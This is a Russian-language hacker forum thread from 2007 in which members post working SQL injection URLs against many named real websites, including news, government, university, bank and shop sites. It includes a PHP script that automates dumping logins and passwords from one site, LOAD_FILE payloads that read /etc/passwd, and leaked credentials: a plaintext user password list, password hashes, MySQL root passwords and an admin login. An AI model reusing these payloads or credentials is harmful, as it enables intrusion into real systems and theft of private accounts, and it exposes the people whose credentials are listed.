Просмотр полной версии : SQL Инъекции
http://www.ixbt.com/news/news.php?id=-99+union+select+1,2,0x707265766564203a44,4,5,6,7,8 ,9,10,11/*
гыы - IXBT ;) можете юзать ;)
http://aprilia.ru/news.php?id=-99+union+select+1,0x707265766564203a44,3,4,5+from+ user/*
.)
http://astrabroker.ru/news/news.php?id=-99+union+select+1,2,3,AES_DECRYPT(%20AES_ENCRYPT(U SER,0x71),0x71),5+from+mysql.user+limit+1,1/*
http://astrabroker.ru/news/news.php?id=-99+union+select+1,2,3,LOAD_FILE('/etc/passwd'),5/*
http://astrabroker.ru/news/news.php?id=-99+union+select+1,2,3,LOAD_FILE('/usr/local/apache/conf/httpd.conf'),5/*
etc... .)
pop_korn
15.01.2007, 23:38
http://www.dvoikatroika.cz/partylist.php?idprt=-388+UNION+SELECT+1,convert(login%20using%20latin2) ,convert(pass%20using%20latin2),4,5,6,7,8,9,0,1,2, 3,4+from+users/*
http://www.ixbt.com/news/news.php?id=-99+union+select+1,2,login,4,5,6,7,8%20,9,password, 11%20from%20user%20limit%201,1/*
http://www.ixbt.com/news/news.php?id=-99+union+select+1,2,login,4,5,6,7,8%20,9,password, 11%20from%20user%20limit%201,1/*
ммм, я специально расписывать не стал =\ а ты :mad:
:p
Ночью делать однозначно нечего =\:
http://www.samsung-mobile.ru/news.php?id=-99+union+select+1,2,table_name,4,5,6+from+INFORMAT ION_SCHEMA.TABLES/*
www.ixbt.com:
===================
unclesam;superpassword
archont;nre11pk
alien;qwos93qrt
star;ver3new
root;another_enter
maxim;vtykytkq
eightn;rvcrrxxr
Cormac;corm
alexcob;mOpoNitO
axbat;se9rq1hM
kryakvina;elf15w40
-bsv-;Hobotrulitadnaznachna
sherbakovs;Rt4df56gZ
rwpbb;ymtupknl
Thunder;Ghtd6fGkl
WSiberian;Ahde9oyeni
Anvakams;fgs6hJKl9
lemar;dfddfkjf
PageEnd;let67dHjk
Neo;dghlo53FUki
digitalhome;superpassword
bess;ehyj2hrf
Sen;sdklt673GhD
Accent;ghetYJkl73LdS
evgeniy;eferwg
BlackCat;dfGt56kLsV
sergeyk;gfsl563gHtW
san-red;gHj952KlD
bugz;sdo349FgHy
jin;gsDfK729Fger
ElenaN;gdHjKl56dE3
<?
echo "<pre>\n";
@set_time_limit(0);
@ini_set("display_errors","0");
$hostname = gethostbyname('www.ixbt.com');
function getid($limit)
{
global $hostname;
$responce = "";
$fsock = fsockopen($hostname,80,$errnum,$errstr,2);
$headers = "GET http://www.ixbt.com/news/news.php?id=-99+union+select+1,2,CONCAT(CHAR(60,115,113,108,62) ,login,CHAR(59),password,CHAR(60,47,115,113,108,62 )),4,5,6,7,8%20,9,10,11%20from%20user%20limit%20$l imit,1/* HTTP/1.1\n";
$headers .= "Host: www.ixbt.com\n";
$headers .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\n";
$headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
$headers .= "Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\n";
$headers .= "Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7\n";
$headers .= "Keep-Alive: 500\n";
$headers .= "Connection: close\n";
$headers .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
fwrite ($fsock,$headers);
while (!feof($fsock)) $responce .= fread($fsock,1024);
fclose ($fsock);
$patern = "#<[\s]*sql[\s]*>([^<]*)<[\s]*/sql[\s]*>#i";
if(preg_match($patern, $responce, $rez)) echo $rez[1]; else echo 'Something not right...';
}
for($i=1;$i<32;$i++) {getid($i);echo "\n";}
echo "</pre>";
?>
про самсунг:
http://www.samsung-mobile.ru/news.php?id=-99+UNION+SELECT+1,2,CONCAT_WS(CHAR(59),user_id,use r_name,user_real_name,user_password,user_newpasswo rd,user_email),4,5,6+from+user/*
1;Wikiadmin;;3538bde67069fb42237f004aae66f73b;;
user_login,user_pass,user_icq,user_email,user_doma in,user_activation_key
http://www.samsung-mobile.ru/news.php?id=-99+UNION+SELECT+1,2,CONCAT_WS(CHAR(59),user_login, user_pass,user_icq,user_email,user_domain,user_act ivation_key),4,5,6+from+blog_users/*
admin;dfed24dcf4255aa50fe4a7ebf291cece;0;post@sams ung-mobile.ru;;
Moderator;d8578edf8458ce06fbc5bb76a58c5ca4;0;post@ samsung-mobile.ru;;
guest3297
16.01.2007, 10:41
MDMKino
http://www.mdmkino.ru/filminfo.php3?id=1014%20UNION%20SELECT%200,1,2,3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29/*
http://www.cris.net/news.php?id=-99+union+select+1,user,password,4+from+mysql.user/*
http://www.rosprom.gov.ru/snews.php?id=-99+union+select+1,2,3,0x3c6d6172717565653e70726576 6564203a443c2f6d6172717565653e,5,6/*
http://www.atlant.by/?r=-1+union+select+55555555,2/*
http://news.samaratoday.ru/wheel.php?r=-1+union+select+1,concat(userid,char(58),email,char (58),username),3,4+from+users+limit+0,2/*
http://www.tiiel.ru/index.php?r=newstext&nid=1'
http://www.avtoram.com/index.php?action=news&id=-1+union+select+1,concat(auth_user,char(58),auth_pa ssword),3,4+from+auth_users+limit+1,1/*
Союз писателей ))
http://www.crazypeople.ru/index.php?cnt=100&news_id=-99+union+select+1,2,3,4,5,6,7,concat(login,0x3a,pa ssword),9,10+from+user+limit+0,1/*
http://www.crazypeople.ru/index.php?cnt=100&news_id=-99+union+select+1,2,3,4,5,6,7,8,concat(username,0x 3a,user_password,0x3a,user_icq),10+from+phpbb_user s/*
Isa:3e2f1979341d3ddc91a8065bb0eb3332
Isa:fhtdbr
http://www.crazypeople.ru/forum/admin/
etc...
_http://lib.chistopol.ru/?cat_id=6+union+select+1,2,3,0x416e746963686174203 b29/*
_http://www.nskfitness.ru/articles.php?cat_id=12+union+select+1,2,0xd3ffe7e2 e8eceef1f2e8a0f1e0e9f2eee2,4,5,6,7,8,9,10,11/*
смотри список часто читаемых статей :)
Termin@L
17.01.2007, 15:03
http://world-basket.biz/galery/photo.php?cat=1
я столбцы подобрать так и не смог, кому не впадлу, подберите
http://abhazia.com/news/detail.php?id=-99'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
Абхазия :mad:
Официальный сайт Школы научной астрологии
http://www.astro-school.ru/secret.html?id=-1+union+select+1,0x3C68313E505245564544203A443C2F6 8313E,3,4/*
http://www.mediaprovinces.kz/index.php?r=-1+union+select+concat(username,char(58),user_id,ch ar(58),user_password),3+from+phpbb_users+limit+1,1/*
Спасиба сам справился! )))
http://www.vendeta.ru/comm.php?id=-1+union+select+1,2,3,login_user,pass_user,6+from+u sers/*
Всем Любителям Бойцовского клуба! )))
Удачного веселья!
guest3297
17.01.2007, 19:20
http://motoboy.hu/munkaadok/index.php?kat=99%20UNION%20SELECT%200,1,2,3,4,5,6, 7,8,9,10,11/*
http://www.mooreindhardware.com/products.php?id=-1+union+select+1,2,convert(version()+using+latin1)/*
___
http://expoelectroseti.ru/index.php?id=-1+union+select+1,2,3,4,5,6,table_name,8+from+INFOR MATION_SCHEMA.TABLES+limit+0,1/*&lng=ru
http://www.paromy.ru/main.php?l1=3&l3=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
при попытке извлеч данные из таблицы, перекидывает на страницу хоста =(
guest3297
18.01.2007, 08:28
http://lineage.te.ua/kb.php?npc_id=25259999%20UNION%20SELECT%200,1,2,3, 4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38/*
http://ultrabyte.ru/viewvac.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41/*
http://02.ru/news/index.php?id_tn=5&id_n=-99+union+select+1,2,3,4,5,6,7/*
http://job.02.ru/sql.php?type=fvac&id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21/*
Вообщем весь "портал" бажный =\
Хостинг UkrNic
http://www.ukrnic.com/hosting_info.php?id=-1+union+select+1,VERSION(),USER()/*
Инет магазин www.PRESSA.net
Обычные юзвери
http://www.pressa.net/about/service.php?id=-1+union+select+1,null,3,4,5,6,7,concat(login,char( 58),password)+from+user/*
С привелегиями
http://www.pressa.net/about/service.php?id=-1+union+select+1,null,3,4,5,6,7,concat(login,char( 58),password)+from+adin_user/*
Thanat0z
20.01.2007, 04:07
сел седня изучать скл-инж, вроде начало получаться, но в итоге логинов/паролей не получил, а так нарыл следующее, может и фигня, хз :
http://www.delfics.com/del_news.asp?NewsID=(SELECT+TOP+1+TABLE_NAME+FROM+ INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+ ('ForumMessages','DelficsClassPhotoPoints','ForumF orums','DelficsClassPhoto','Banners','Articles','F orumSections','NewsVendors','ATI_Sections','Manage rShopPollOtherSources','NewsDelfics','ATI_MBChipse t','ProductsTypes','dtproperties','ForumSubscriber s','ManagerShopLogins','LinksFamajor','ManagerShop PollSources','ManagerShopPollDay','ManagerShopPoll Sums','GbSections','NewsBigmir','NewsCompany','MHS hops','NewsGB','NewsHifiSections','NewsShop','News Hifi','ProductsAction','ProductsArticles','Manager ShopPollCustomer','ProductsComputersAction','Produ ctsDrivers','ProductsCertificatesAccordance','Prod uctsParameters','ProductsMain','ProductsParameters AccordanceTypes','ProductsParametersVariantValues' ,'ProductsSections','ProductsParametersValues','Pr oductsTerms','ProductsValues','RacingCardsView','S earchQueries','ShopCustomers','ServiceCenters','Sh opCustomersCities','RacingBingo','Racings','ShopCu stomersRegions','ShopDeliveryNightExpress','ShopDe liveryVariants','ShopOrders','ShopOrdersComments', 'ShopOrdersItems','StormTypes','ProductsCertificat es','ShopOrderStatuses','ShopProductsOnMain','Shop Sessions','ShopPaymentVariants','sysconstraints',' Vendors','StormProducts','VotesQuestions','VotesAn swers','syssegments','ShopDeliveryPlaces','RacingC ards','VendorsStatuses','ProductsTypesDiscont','MH Saturday','ProductsLinks'))--
и детальные на некоторые
http://www.delfics.com/del_news.asp?NewsID=(SELECT+TOP+1+COLUMN_NAME+FROM +INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='GbSe ctions'+AND+COLUMN_NAME+NOT+IN+('sectionID','secti onurl','sortorder','parentid','sectioncontent','se ctionname'))--
http://www.delfics.com/del_news.asp?NewsID=(SELECT+TOP+1+COLUMN_NAME+FROM +INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='dtpr operties'+AND+COLUMN_NAME+NOT+IN+('id','objectid', 'property','value','uvalue','lvalue','version'))--
http://www.delfics.com/del_news.asp?NewsID=(SELECT+TOP+1+COLUMN_NAME+FROM +INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='Arti cles'+AND+COLUMN_NAME+NOT+IN+('Article_id','Articl e_Name','File_name','Type_id','Views','ArticleType _id','Vendor_Id','add_date','ProductsSection_Id'))--
если кто-то что-то интересное вытянет, напишите в приват, а то мне учиться надо :)
_http://www.searchmonster.org/index.php?lw=16903+union+select+1,2,3,4,5+from+wsr/*
на столбцы не хватило нервов))
http://www.gelezo.net/files.php?id=20031030191145'
http://www.gelezo.net/files.php?id=20031030191145'
хоть столбцы бы подобрал :p
http://www.gelezo.net/files.php?id=-99'+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
http://www.mtas.ru/second.php?ID=-1+union+select+1/*
icek вот) подобрал)))
=) ну так))) кстати http://www.rudtp.ru/articles.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8/* дальше не АСИЛИЛ
Sn@k3
там используется 2 запроса сразу. врятли можно что-то вытащить. попробуй здесь:
http://www.rudtp.ru/download.php?id=-2+or+1=1/*
_http://www.uprava.org/section.php?id=225+union+select+1,2,3,4,5,6,0xc7eb feeae020e1fbeb20e7e4e5f1fc203a29/*
_http://galagraphics.kz/portfolio.php?id=11+union+select+1,2,3,4,password, 6,7,8,9,10+from+mysql.user/*
хэш тут в SHA-1?
big_BRAT
21.01.2007, 20:41
Сайт: http://forum.vbios.com/
Результат: выполнение SQL команд (нпр. получения пароля пользователя)
Количество пользователей: 11013
URL: http://forum.vbios.com/addons/kit/serverinfo.php?id=-32+union+select+1,2,3,4,5,6,7,8,9,10,null,12,conca t(U_LoginName,%22:%22,U_Password)+from+w3t_Users+w here+U_Name=%22Arafat%22/*
======
Я сдесь не давно, кому помог не сочтите за сложность, поставьте +
http://heraldry.com.ua/index.php3?lang=U&id=1344+union+select+0,0,0,VERSION(),0,0,0,0,0,0,0 ,0/*
http://mobile.ru/news.php?news_id=-1+union+select+1,USER(),1,VERSION(),1,1,1,1+/*
http://nikzdejoe.odessa.ua/?article=7425'+union+select+0,0,0/*
http://www.gazeta.tv/news.php?id=192+union+select+0,0,0,0,0,0,0/*
http://vipflat.kiev.ua/news/full_news.html?new_id=4148'+union+select+0,0,0,0,0 ,0,0,0,0,0,0,0,0,0,0,0,0,0/*
http://thepiratebay.org/blog.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0/*
http://www.soaw.org/new/article.php?id=-2+or+1=1/*
http://www.auditorium.ru/pers/person.php?id=-1+union+select+1,2,3,4--
[
http://www.rgups.ru/pages.php?id=-1+union+select+version()/*
http://www.rgups.ru/pages.php?id=-1+union+select+LOAD_FILE(0x2f6574632f706173737764)/* ]
http://www.apahelpcenter.org/featuredtopics/feature.php?id=-2+or+1=@@version--
Сайты они видети ли разрабатывают :mad:
http://www.netservice.ru/portfolio_details.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
http://nemchenko.ru/main.php?id=-99+union+select+LOAD_FILE(0x2f6574632f706173737764 )/*
aka /etc/passwd^^
http://nemchenko.ru/main.php?id=-99+union+select+concat(user,0x3a,password)+from+my sql.user/*
::
root:5194866966b75566
aka
root:1q2w3e
Коннектиться можно удалённо... ;)
http://www.rolemancer.ru/article.php?sid=-1+union+select+1,2,3,concat(uname,char(58),pass,ch ar(58),email,char(58),user_icq,char(58),name),44,6 ,7,8,9,11111,11+from+users+limit+16,1/*
http://www.forsleep.ru/index.php?rn_id=-1+union+select+1,version(),3,4,5,6,7/*
http://www.ipecac.com/bio.php?id=-1+union+select+1,2,3,system_user()/*
http://www.cognos.ru/stuff/news_bd.php?n_cod=-1+union+select+1,2,3,4,user(),version()/*
http://www.amic.ru/forum/?topic=980990+union+select+1,2,3,4,5,version(),7,8 ,9,10,11/*&page=55
Таблица user.
http://advancedcatalog.com.ru/modules.php?name=Web_Links&l_op=viewlink&cid=-1+union+select+1,2/*&min=600&orderby=hitsA&show=20
искал по экзамену.... вообщем в первой колонке реален вывод...
http://www.ckn.ru/srochnoall.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
http://www.keckobservatory.org/article.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
http://rss2.ru/read.php?id=-99+union+select+1,convert(user+using+cp1251),conve rt(password+using+cp1251),4,5,6,7,8,9,10,11,12,13+ from+mysql.user/*
http://www.atvmedia.ru/read.php?id=-99+union+select+1,2,3,4,user,password,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22+from+mysql.user/*
root:3a27e90e7ddcbf0f
root:a878
=\
http://www.patentoved.com/content.php?id=-99'+union+select+user()/*
http://www.ukrnic.com/hosting_info.php?id=-99+union+select+1,2,3/*
UkrNic hosting =\
http://www.bizhost.ru/news/podrobno.php?id=-99+union+select+convert(table_name+using+cp1251),2 ,3,4,5,6+from+INFORMATION_SCHEMA.TABLES+limit+0,1/*
BizHost =\
http://www.kinoafisha.ru/index.php3?id1=3422+union+select+1,1,1,1,1,1,1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,2,3,4,5,6,7,8,9,10,11,12,13/*&status=1
кол-во полей так и не доподобрал)
http://www.partytown.ru/music.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,concat(uname,0x3a,pass),21+from+cine ma_user+limit+0,1/*
http://www.goldedem.ru/?page=4+union+select+1,2,3,4,5/*
http://www.talitur.ru/tusa.php?idd=4+union+select+1,2,3,4,5,6,7/*
InferNo23
23.01.2007, 16:37
http://www.yuretz.ru/prikol.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10, 11,12/*
http://www.mks-ks.ru/shop/offer.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,18/*
http://www.paintball.ru/next.php?id=268%20union%20select%201,2,3/*
http://www.softmart.ru/prog/show_prog.php?id=1+union+select+1/*
http://www.leaderhost.ru/price/content.php?id=-99+union+select+1,2,user(),4,5,6/*
http://www.ecominfo.spb.ru/about/print.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,column_name,17,18,19,20,21,22,23,24,25,26+from+I NFORMATION_SCHEMA.COLUMNS+WHERE+table_name='users' +limit+0,1/*
http://bitmaster.ru/index.php?id=-99+union+select+1,2,0x707265766564,4/*
=\
http://moritzlaw.osu.edu/faculty/bios.php?ID=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17
кто сможет пароль админский поиметь напишите в личку
P.S. Там пятая версия МуСкула. Таблицы admin_web и phorum_user
Интересует таблица admin_web. Логины есть, а таблицу с паролями я не нашёл. Может кто нибудь подберёт =\
_http://www.btl.ru/c/hr-vacancy.php?id=1728%20UNION%20SELECT%201,2,version (),database(),5,6,7,8,9,10,11,12,13,14,15,16,17/*
http://www.spytop.ru/maincat.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,concat(login,0x3 a,pass),11,12+from+user/*
^^ - там странички полистаете .)
http://www.hazart.ru/index.php?id=5+union+select+1,2,3,4,5,6+from+admin _users/*
http://www.astek-travel.ru/price.php?id_level=400+union+select+1,name,3,4,5,p wd,email,8,9,10,11,12,13,14,15,16+from+users/*
Смотрим синюю шнягу) Чтоб было лучше видно - просто выделяем её)
http://www.hw.net.ua/art.php?id=-99'+union+select+table_name+from+INFORMATION_SCHEM A.TABLES+limit+16,2/*
Termin@L
24.01.2007, 15:02
кто сможет пароль админский поиметь напишите в личку
P.S. Там пятая версия МуСкула. Таблицы admin_web и phorum_user
Интересует таблица admin_web. Логины есть, а таблицу с паролями я не нашёл. Может кто нибудь подберёт =\
Вот столбцы admin_web
tID
username
all_access
alumni
calendar
cilps
events
exam_archive
faculty_bios
faculty_news
faculty_workshops
faculty_rotation
faculty_digest
osjcl
elam
psf
registrar
Не все правда, но большинство, но есть ещё одна интересная таблица access: username, password.
VampiRUS
24.01.2007, 15:32
http://www.ntkernel.com/wprod.php?ids=2+union+select+null,null,USER()/*
http://www.jurnal.md/articol.php?id=5722+union+select+1,2,userna me,userpas s,5,6,7,8,9,10,11+from+users/*
_____________________________________________
Shake if you want -Run if you can't !!!
_http://www.freelancejob.ru/vacancy.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16/*
названия таблиц не подобрал ((
_http://prazdnik.com.ua/vacancy.php?id=5%20UNION%20SELECT%201,2,concat(log in,char(58),pass),4,5,6,7,8+from+user+limit+1,1/*
_http://prazdnik.com.ua/vacancy.php?id=5%20UNION%20SELECT%201,2,3,4,5,6,7, 8+ipbforum/*
к хосту прикручен форум ipb походу версии 1.3, название таблиц оттуда подобрать не смог...может кто поможет :)
_http://www.algis.ru/main.php?f=9&part=33&subpart=25+union+select+1,2,3,concat(name_users,ch ar(58),password_users,char(58),email_users,char(58 ),tel_users),0x68612d68613b29,6,7,8,9,10,11,12,13, 14+from+users/*
титл страницы после этого смешной становится))..правда пассы х.з как зашифрованы
http://www.mmcc.ru/events.php?id=1+union+select+1,concat(user,char(58 ),password)+from+mysql.user/*
х.з почему пасс не выводится...может его нет))
http://www.mmcc.ru/events.php?id=1+union+select+1,LOAD_FILE(char(47,1 01,116,99,47,112,97,115,115,119,100))+from+mysql.u ser/*
.EDU домены =)
http://www.linfield.edu/humanresources/detail.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
http://www.cpd.usu.edu/division.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10/*
http://experts.uchicago.edu/experts.php?id=459+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+f rom+mysql.user/*
Кто докопается до паролей и тд прошу писать в ПМ
х.з почему пасс не выводится...может его нет))
бывает..
guest3297
25.01.2007, 19:57
http://kuda.nordiz.ru/tovar.php?tovar_id=-1%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4 6,47,48,49,50,51,52,53,54+from+phpbb_users/*
http://www.ihrc.org.uk/show.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
____
Thanat0z
26.01.2007, 00:48
http://www.formicarium.pl/open.php?p=artykuly&dzial=-1+UNION+SELECt+database(),2/*
http://www.formicarium.pl/open.php?p=artykuly&dzial=1&art=-1+UNION+SELECt+database(),USER(),version()/*
http://www.formicarium.pl/open.php?p=artykuly+union+select+1/*
http://www.flirtanica.ru/articles1.php?id=-1+union+select+1,2,3,4,5/*
http://www.fcdynamo.ru/material.php?id=642'+union+select+1,2,3,4,5,6,7,8/*
http://vostokmedia.com/news.details.php?id=-2+or+1=1/*
http://www.pvd.gov.lv/index.php?id=-2+or+1=1/*
http://www.mpa.ru/cis/country.php?id=-1+union+select+database(),system_user(),version()/*
http://www.keckobservatory.org/article.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
http://www.etnosfera.ru/ecentr.php?id=-2+or+1=1/*
http://www.dynamomania.com/comment.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
было пять минут тока, во...
Shadow']На islam.ru
http://www.islam.ru/shop/index.php?cat=-1+union+select+0,email,password,0,0+from+users/*
выяснил таблицу и нужные столбцы, но что то с выводом никак, у кого получится стучитесь в личку дальше больше....
http://www.islam.ru/shop/index.php?sample=771&good=98&cat=-1+union+select+1,2,3,4,concat(password,char(58),id ,CHAR(194,206,210,32,194,219,194,206,196,33))+from +users+limit+0,1/*
Без пробелов!
http://www.dynamomania.com/comment.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
было пять минут тока, во...
Я доделал...
http://www.dynamomania.com/comment.php?id=-1+union+select+1,2,Pwd,name,5,email,7,8+from+users +limit+0,1/*
.EDU домены =)
Кто докопается до паролей и тд прошу писать в ПМ
бывает..
h..p://experts.uchicago.edu/experts.php?id=459+union+select+1,2,3,4,user(),6,v ersion(),password,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26%20,27,28,29,30,31,32,33,34,35 ,36,37,38,39,40,41,42+from+mysql.user/*
http://www.machinima.com/films.php?id=-1+union+select+version()/*
http://www.enterpriseinnovation.net/news.php?id=-7+union+select+1,2,3,4,5,6,7/*
http://www.hispanicprwire.com/news.php?l=in&id=-9+union+select+1,2,3,convert(1+using+latin1),5,6,7 ,8,9/*
не надо в 3 отдельных поста все это (m0nzt3r)
http://www.m-study.ru/courses/descr/?news_id=-60+union+select+1111,22222,33333/*
смотрим топ, там вывод)
http://www.sovrep.gov.by/index.php/.557.2923...0.0.0.html
==
http://www.sovrep.gov.by/index.php/.557.2924-1...0.0.0.html
http://websib.ru/new_detail.php?new_id=-1+union+select+1,password,user+from+mysql.user/*
http://www.museum.sakha.ru/forum.php?f=1+union+select+1,2,3,4,5,convert(versi on()+using+cp1251),concat(convert(password+using+c p1251),char(58),convert(user+using+cp1251)),8,9,10 +from+mysql.user/*
_http://ul-online.ru/modules/job/vacancy.php?id=7+union+select+1,concat(user,char(5 8),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23+from+mysql.user/*
вывод из БД root:JF5555o
_http://ul-online.ru/modules/job/vacancy.php?id=7+union+select+1,concat(user_id,cha r(58),username,char(58),user_password,char(58),use r_email),3,4,5,6,7,8,9,10,11,LOAD_FILE(char(47,101 ,116,99,47,112,97,115,115,119,100)),13,14,15,16,17 ,18,19,20,21,22,23+from+phpbb_users+limit+1,1/*
вывод инфы из форума...пасс админа расшифровать не удалось :(
http://www.linspire.com/lindows_news_pressreleases_archives.php?id=-1+union+select+0x536e406b333a206e75206f6368656e207 370617420686f63686563612e2e2e,2/*
http://www.akihabaranews.com/en/news_details.php?id=-1+union+select+1,2,version(),4/*
на сон грядущий....
Парой бывает необходимо перевести "слово" в нужную кодировку, хоть то 16 бит, или char, то вот фича, там ещё полно кодировок:
http://snak3.h17.ru/tools/
InferNo23
28.01.2007, 14:33
TbBank
http://www.tbbank.ge/ge_news.php?news_id=-1+union+select+1,2,3,4,5,6/*
Красноярский городской сайт
http://kgs.ru/news.shtml?title=-1+union+select+1,2,user(),version(),5,6/*
Game-Ost
http://www.game-ost.ru/articles.php?id=-1+union+select+1,2,3,4,5,6,7/*&action=view
Rucenturion
http://www.rucenturion.com/view_news.php?news_id=89+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16/*
Flirtanica
http://www.flirtanica.ru/articles1.php?id=-1+union+select+1,2,3,4,5/*
OBDD
http://www.obdd.ru/news_one.php?news_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17/*
http://calculatoare.ido.ro/index.php?id=2+union+elect+1,id,user(),4,5,6,7,8,9 ,10,11+from+articles/*
_____________________________________________
Shake if you want-Run if you can't !
http://colombia.indymedia.org/print.php?id=54766 +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25 /*
____________________________________________
_http://www.kultura72.ru/guide.php?idlt=26&t_id=35%20union%20select%201,concat(username,char( 58),user_password,char(58),char(58),user_email),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23%20from%20phpbb_users/*
но форум фуфло полное
http://washingtontimes.com/functions/email.php?StoryID='
Пример :
'%20union%20all%20select%20top%20800%20UserID,1%20 from%20Insider_Users--
'%20union%20all%20select%20top%20800%20password,1% 20from%20Insider_Users--
http://www.globalsat.su/news.php?n_id=-1+union+select+1,2,3,4,5,222,7/*
http://www.export.by/rus/news2.php?action=archive&from=130&cat_id=-1+union+select+1,2,22,user,password,6,7,8,9,10+fro m+mysql.user/*
http://www.know-house.ru/card_firm.php?n_id=12'
http://www.emic.ee/page.php?id=55555%20union%20select%201,2,3,4,5,6,V ERSION(),8,9,DATABASE(),11,12,13,14,15/*--
http://www.latek.com.ua/index.php?page=produkt.php&subcat=-1+union+select+1,1,55,66,6,concat(log,char(58),pas ),3,8+from+user+limit+0,11/*
http://www.vigvam.ru/index.php?chp=anec_full&id=-1+union+select+database()/*
http://www.vengria.com/index.php?page=statji&Id_s=-1+union+select+1,2,3,4,user_name,user_pass,7,8,9,1 0,11,12,13+from+users+limit+0,1/*
http://www.skysharks.ru/index.php?page=news&id=-1+union+select+1,concat(email,password),username,4 ,5,6,7+from+user/*
http://www.in-sports.ru/index.php?page=news&nid=-1+union+select+1,2,3,4,5/*
Портал Киберспорта )
http://www.trutnee.com/index.php?page=1&id=-1+union+select+1,2,3,login,5,6,password,8+from+use rs+limit+0,1/*
http://www.bestcourier.ru/catalog/index.php?ID=1&id=-1+union+select+2/*&pgs1=1
не смог подобрать нужную кодировку =\
InferNo23
29.01.2007, 15:05
MichaelPollan.com
http://www.michaelpollan.com/article.php?id=-1+union+select+1,user(),version(),4,5,6,database() ,8,9,10/*
KeckObservatory.org
http://www.keckobservatory.org/article.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
BlogsForLearning.msu.edu
http://blogsforlearning.msu.edu/articles/view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9/*
http://www.c82.net/article.php?ID=1'
http://www.uua.org/uuawo/new/article.php?id=-1'
http://www.soaw.org/new/article.php?id=-1'
нельзя инклуды, шеллы =\
http://www.02.ru/news/index.php?id_tn='02'
http://www.ifmo.ru/sr/?out=person&id=75'%20union%20select%201,2,3,4,5,6,7/*
http://www.keckobservatory.org/article.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
http://www.keckobservatory.org/article.php?id=-1+union+select+1,LOAD_FILE(char(47,101,116,99,47,1 12,97,115,115,119,100)),3,4,5,6,7,8/*
http://www.fgb.ge/index.php?lang_id=ENG&sec_id=10050+union+select+1,2,3,4,5,6,concat(edito r_userneme,0x3a,editor_pwd)+from+editors/*
http://www.fgb.ge/admin
admin:itdc1526
:)
InferNo23
30.01.2007, 14:16
http://www.brandonsun.com/story.php?story_id=-1+union+select+password,2,user,4,5,6,7,8,9,10+from +mysql.user/*
http://art.stanford.edu/bio.php?name_id=-1+union+select+1,2,3,4,version(),user,7,8,9,10,11, 12,13,14,15,password,17,18,19+from+mysql.user/*
http://www.magic-productions.fr/games_details.php?game_id=-1+union+select+1,2,3,4,version(),6,7,8,9/*
http://www.trackandfieldnews.com/lists/display_list.php?list_id=-1+union+select+1,user(),3,version(),5,6/*
http://www.jacksonholenews.com/article.php?art_id=1+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16/*
http://rfe.org/showCat.php?cat_id=-1+union+select+1,2,3,4,5,6,7,8/*
BlackCats
30.01.2007, 15:00
моя первая инъекция!!!
:D :D :D
1 столбец
:D :D :D :D
http://www.mtas.ru/second.php?ID=-1+union+select+1/*
BlackCats
